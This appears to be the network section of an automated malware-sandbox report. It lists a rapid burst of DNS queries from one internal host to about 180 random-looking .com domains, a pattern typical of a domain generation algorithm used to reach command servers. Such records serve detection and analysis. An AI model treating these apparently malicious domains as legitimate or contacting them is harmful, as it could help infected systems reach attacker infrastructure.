                                                                                                                                                                                                            Sep 8, 2024 09:00:06.698879957 CEST192.168.2.41.1.1.10xfe15Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.699449062 CEST192.168.2.41.1.1.10x8e7cStandard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.699686050 CEST192.168.2.41.1.1.10x50d7Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.705569029 CEST192.168.2.41.1.1.10x5a2aStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.705753088 CEST192.168.2.41.1.1.10x9eacStandard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706259012 CEST192.168.2.41.1.1.10x3748Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706799030 CEST192.168.2.41.1.1.10x2bcaStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:06.706990004 CEST192.168.2.41.1.1.10x78c7Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.392051935 CEST192.168.2.41.1.1.10xae7cStandard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.393167019 CEST192.168.2.41.1.1.10xceb2Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.395876884 CEST192.168.2.41.1.1.10xe24cStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.397186995 CEST192.168.2.41.1.1.10x2c3cStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.400741100 CEST192.168.2.41.1.1.10xee52Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.400867939 CEST192.168.2.41.1.1.10x921dStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.405061960 CEST192.168.2.41.1.1.10xa75fStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.412934065 CEST192.168.2.41.1.1.10xc7b8Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.413288116 CEST192.168.2.41.1.1.10x182Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.431855917 CEST192.168.2.41.1.1.10x828fStandard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.466731071 CEST192.168.2.41.1.1.10x26aStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.466928005 CEST192.168.2.41.1.1.10xa835Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467081070 CEST192.168.2.41.1.1.10x81a5Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467317104 CEST192.168.2.41.1.1.10xe8f8Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467562914 CEST192.168.2.41.1.1.10x6eafStandard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.467844009 CEST192.168.2.41.1.1.10xd66Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472284079 CEST192.168.2.41.1.1.10xf2f9Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472539902 CEST192.168.2.41.1.1.10x9e42Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472759008 CEST192.168.2.41.1.1.10xc5b1Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.472910881 CEST192.168.2.41.1.1.10xfda6Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473056078 CEST192.168.2.41.1.1.10x857dStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473229885 CEST192.168.2.41.1.1.10x1fe3Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473560095 CEST192.168.2.41.1.1.10x7740Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473788977 CEST192.168.2.41.1.1.10x7bf8Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.473969936 CEST192.168.2.41.1.1.10xfeb5Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.474760056 CEST192.168.2.41.1.1.10x5a4dStandard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.475267887 CEST192.168.2.41.1.1.10x71e1Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.475622892 CEST192.168.2.41.1.1.10x5192Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.476222038 CEST192.168.2.41.1.1.10x3498Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.477535963 CEST192.168.2.41.1.1.10xd481Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486556053 CEST192.168.2.41.1.1.10xf245Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.486825943 CEST192.168.2.41.1.1.10x6345Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.487881899 CEST192.168.2.41.1.1.10x2870Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.497550011 CEST192.168.2.41.1.1.10x518dStandard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.497963905 CEST192.168.2.41.1.1.10x59d9Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.498974085 CEST192.168.2.41.1.1.10x6175Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499182940 CEST192.168.2.41.1.1.10x6e8fStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499368906 CEST192.168.2.41.1.1.10x47b1Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499463081 CEST192.168.2.41.1.1.10xf7dStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499600887 CEST192.168.2.41.1.1.10xe56dStandard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499754906 CEST192.168.2.41.1.1.10x1f85Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499783039 CEST192.168.2.41.1.1.10xd92Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.499954939 CEST192.168.2.41.1.1.10x43b1Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500107050 CEST192.168.2.41.1.1.10xd185Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500293016 CEST192.168.2.41.1.1.10x1c0eStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500477076 CEST192.168.2.41.1.1.10x2c04Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500796080 CEST192.168.2.41.1.1.10xf118Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500956059 CEST192.168.2.41.1.1.10x1453Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501152992 CEST192.168.2.41.1.1.10xab85Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501293898 CEST192.168.2.41.1.1.10xa360Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501862049 CEST192.168.2.41.1.1.10xd01cStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504173040 CEST192.168.2.41.1.1.10xcee3Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504513025 CEST192.168.2.41.1.1.10xc454Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504785061 CEST192.168.2.41.1.1.10xeecfStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504960060 CEST192.168.2.41.1.1.10x8843Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.505572081 CEST192.168.2.41.1.1.10xd9c5Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506097078 CEST192.168.2.41.1.1.10xa8faStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506112099 CEST192.168.2.41.1.1.10xc619Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506716013 CEST192.168.2.41.1.1.10x15d9Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506925106 CEST192.168.2.41.1.1.10x55f9Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.513241053 CEST192.168.2.41.1.1.10xa8edStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532464981 CEST192.168.2.41.1.1.10x6149Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532715082 CEST192.168.2.41.1.1.10xbbd7Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.541325092 CEST192.168.2.41.1.1.10x6218Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.205847025 CEST192.168.2.41.1.1.10xb4f3Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.206372023 CEST192.168.2.41.1.1.10x8b2dStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.264537096 CEST192.168.2.41.1.1.10x3cf8Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.265037060 CEST192.168.2.41.1.1.10x7fd0Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.320461035 CEST192.168.2.41.1.1.10xf7cdStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321307898 CEST192.168.2.41.1.1.10xb6Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321723938 CEST192.168.2.41.1.1.10x9dd0Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.322669983 CEST192.168.2.41.1.1.10x617fStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323118925 CEST192.168.2.41.1.1.10xb796Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323853970 CEST192.168.2.41.1.1.10x2c0Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.324640036 CEST192.168.2.41.1.1.10x871bStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325479984 CEST192.168.2.41.1.1.10x8c1aStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325956106 CEST192.168.2.41.1.1.10x81f3Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.326291084 CEST192.168.2.41.1.1.10x51c8Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327039003 CEST192.168.2.41.1.1.10xb1f2Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327441931 CEST192.168.2.41.1.1.10x7b0aStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328145981 CEST192.168.2.41.1.1.10xee71Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328774929 CEST192.168.2.41.1.1.10x46c0Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.329438925 CEST192.168.2.41.1.1.10xcb72Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330265999 CEST192.168.2.41.1.1.10x5c18Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330899000 CEST192.168.2.41.1.1.10x7917Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.331628084 CEST192.168.2.41.1.1.10xf7d9Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332161903 CEST192.168.2.41.1.1.10xd053Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332742929 CEST192.168.2.41.1.1.10xfc14Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.333103895 CEST192.168.2.41.1.1.10x51deStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.347846985 CEST192.168.2.41.1.1.10xdaacStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348313093 CEST192.168.2.41.1.1.10xa2d3Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348619938 CEST192.168.2.41.1.1.10x79b5Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349128008 CEST192.168.2.41.1.1.10xdb72Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349817038 CEST192.168.2.41.1.1.10xd9c5Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350105047 CEST192.168.2.41.1.1.10x27bdStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350368023 CEST192.168.2.41.1.1.10xbfb2Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350599051 CEST192.168.2.41.1.1.10xb1b5Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351074934 CEST192.168.2.41.1.1.10xd920Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351635933 CEST192.168.2.41.1.1.10x2eaaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352152109 CEST192.168.2.41.1.1.10xe07eStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352705956 CEST192.168.2.41.1.1.10x8dbaStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352983952 CEST192.168.2.41.1.1.10x404bStandard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354161978 CEST192.168.2.41.1.1.10x7685Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354547977 CEST192.168.2.41.1.1.10xab93Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354830027 CEST192.168.2.41.1.1.10x26a6Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.355128050 CEST192.168.2.41.1.1.10xe20Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357017994 CEST192.168.2.41.1.1.10x714eStandard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.360832930 CEST192.168.2.41.1.1.10xac77Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361110926 CEST192.168.2.41.1.1.10xd4c1Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361299038 CEST192.168.2.41.1.1.10xa60bStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361856937 CEST192.168.2.41.1.1.10xf5e7Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363137007 CEST192.168.2.41.1.1.10x7b0aStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363646984 CEST192.168.2.41.1.1.10x67dStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.370637894 CEST192.168.2.41.1.1.10xc741Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.396419048 CEST192.168.2.41.1.1.10x6fd3Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.397888899 CEST192.168.2.41.1.1.10x7dbaStandard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398355007 CEST192.168.2.41.1.1.10xb6ffStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398705006 CEST192.168.2.41.1.1.10xd614Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398922920 CEST192.168.2.41.1.1.10x2d4aStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399169922 CEST192.168.2.41.1.1.10xdc1Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399334908 CEST192.168.2.41.1.1.10xee67Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399725914 CEST192.168.2.41.1.1.10xe221Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399893999 CEST192.168.2.41.1.1.10xd3d9Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400285959 CEST192.168.2.41.1.1.10x8c44Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400449991 CEST192.168.2.41.1.1.10x3865Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408890009 CEST192.168.2.41.1.1.10x5cb4Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.409749031 CEST192.168.2.41.1.1.10x6c84Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.411005020 CEST192.168.2.41.1.1.10x18faStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.046753883 CEST192.168.2.41.1.1.10x6b0dStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.048801899 CEST192.168.2.41.1.1.10x62aeStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.049343109 CEST192.168.2.41.1.1.10x64edStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.050534010 CEST192.168.2.41.1.1.10x1303Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.050915003 CEST192.168.2.41.1.1.10xe82cStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.052118063 CEST192.168.2.41.1.1.10x892eStandard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.052680016 CEST192.168.2.41.1.1.10x4966Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.054285049 CEST192.168.2.41.1.1.10x21d5Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.055013895 CEST192.168.2.41.1.1.10x8915Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.055982113 CEST192.168.2.41.1.1.10xb55dStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056137085 CEST192.168.2.41.1.1.10x6199Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056426048 CEST192.168.2.41.1.1.10x4fb6Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.056516886 CEST192.168.2.41.1.1.10x5994Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057233095 CEST192.168.2.41.1.1.10xc272Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057549953 CEST192.168.2.41.1.1.10x17a5Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057562113 CEST192.168.2.41.1.1.10x361fStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.057967901 CEST192.168.2.41.1.1.10x5114Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.065710068 CEST192.168.2.41.1.1.10xa124Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071218014 CEST192.168.2.41.1.1.10xc95fStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071331978 CEST192.168.2.41.1.1.10x69ceStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071739912 CEST192.168.2.41.1.1.10x159aStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.071930885 CEST192.168.2.41.1.1.10xb207Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072345018 CEST192.168.2.41.1.1.10x5d6cStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072706938 CEST192.168.2.41.1.1.10xfd50Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.072911978 CEST192.168.2.41.1.1.10x7805Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073409081 CEST192.168.2.41.1.1.10x7d4aStandard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073683023 CEST192.168.2.41.1.1.10xd77aStandard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.073935986 CEST192.168.2.41.1.1.10xd6c6Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074218035 CEST192.168.2.41.1.1.10xc252Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074605942 CEST192.168.2.41.1.1.10x33c8Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.074786901 CEST192.168.2.41.1.1.10x3d20Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075156927 CEST192.168.2.41.1.1.10x58Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075411081 CEST192.168.2.41.1.1.10xd897Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.075743914 CEST192.168.2.41.1.1.10x2a8eStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076025009 CEST192.168.2.41.1.1.10xfecdStandard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076538086 CEST192.168.2.41.1.1.10xe62eStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.076654911 CEST192.168.2.41.1.1.10xbfc0Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.078494072 CEST192.168.2.41.1.1.10x4aafStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.080528021 CEST192.168.2.41.1.1.10xd941Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.080651999 CEST192.168.2.41.1.1.10x8073Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.081211090 CEST192.168.2.41.1.1.10x57b5Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.082920074 CEST192.168.2.41.1.1.10x6c5dStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.083825111 CEST192.168.2.41.1.1.10x6342Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.084388971 CEST192.168.2.41.1.1.10xd647Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.092412949 CEST192.168.2.41.1.1.10x759aStandard query (0)pumywov.comA (IP address)IN (0x0001)false
